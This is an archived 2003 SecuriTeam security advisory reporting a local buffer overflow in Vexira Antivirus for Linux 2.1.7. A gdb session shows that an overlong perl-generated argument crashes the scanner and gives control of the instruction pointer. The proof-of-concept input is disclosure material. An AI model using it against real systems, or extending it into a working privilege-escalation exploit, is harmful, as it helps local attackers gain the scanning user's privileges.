[UNIX] Buffer Overflow in Vexira Antivirus

From: support@securiteam.com
Date: 04/18/03

  • Next message: support@securiteam.com: "[UNIX] Multiple Vulnerabilities in Ez Publish"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 18 Apr 2003 11:48:01 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Buffer Overflow in Vexira Antivirus
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.centralcommand.com/linux_products.html> Vexira Antivirus is
    "A complete virus defense system designed for easy and dependable virus
    prevention on Linux based servers." The product has been found to suffer
    from a buffer overflow that allows local attackers to gain the privileges
    of the scanning user.

    DETAILS

    Vulnerable systems:
     * Vexira Antivirus for Linux 2.1.7

    Example:
    [lucae@linux]$ gdb vexira

    GNU gdb 5.2.1-2mdk
    Copyright 2002 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you
    are welcome to change it and/or distribute copies of it under certain
    conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "i586-mandrake-linux-gnu"...
    (no debugging symbols found)...
    (gdb) set args `perl -e 'print "ABCD" x 70'`
    (gdb) run

    Starting program: /usr/lib/Vexira/vexira `perl -e 'print "ABCD" x 70'`
    Vexira Antivirus / Linux Version 2.1.7
    Copyright (C) 2002-2003 Central Command, Inc. and/or its suppliers.
    Portions copyright (C) 1996-2003 H+BEDV Datentechnik GmbH.
    All rights reserved.

    (no debugging symbols found)...
    Program received signal SIGSEGV, Segmentation fault.
    0x44434241 in ?? ()
    (gdb)

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:luca.ercoli@inwind.it> Luca
    Ercoli.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: support@securiteam.com: "[UNIX] Multiple Vulnerabilities in Ez Publish"

    Relevant Pages

    • Re: Development / Debugging tools - advice needed.
      ... > command to make gdb show stuff in ... comparison to Linux as an OS. ... that the reason that Turbo Debugger ... control of the hardware away from it, ...
      (comp.os.linux.development.system)
    • [UNIX] Progress Database Local Buffer Overflow
      ... # gdb /usr/dlc/bin/_mpros core ... Segmentation fault. ... Reading symbols from /lib/libm.so.6...done. ... There is absolutely no warranty for GDB. ...
      (Securiteam)
    • Page faults every few days
      ... It is always a page fault. ... GNU gdb 4.18 ... There is absolutely no warranty for GDB. ...
      (freebsd-questions)
    • Page faults every few days
      ... It is always a page fault. ... GNU gdb 4.18 ... There is absolutely no warranty for GDB. ...
      (freebsd-stable)
    • Re: Gentoo on Sun Ultra 5
      ... I have it working now (and the information I read on several Linux ... > just crashes the system seems to be out of date, ... I have really quite a lot of systems with GCC and no GDB, ...
      (uk.comp.os.linux)